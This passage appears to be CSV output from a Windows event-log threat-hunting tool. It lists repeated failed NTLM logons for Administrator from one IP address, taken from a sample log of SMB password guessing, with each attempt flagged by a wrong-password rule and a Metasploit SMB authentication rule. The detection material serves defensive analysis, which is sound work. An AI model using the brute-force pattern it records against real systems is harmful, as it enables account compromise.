NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
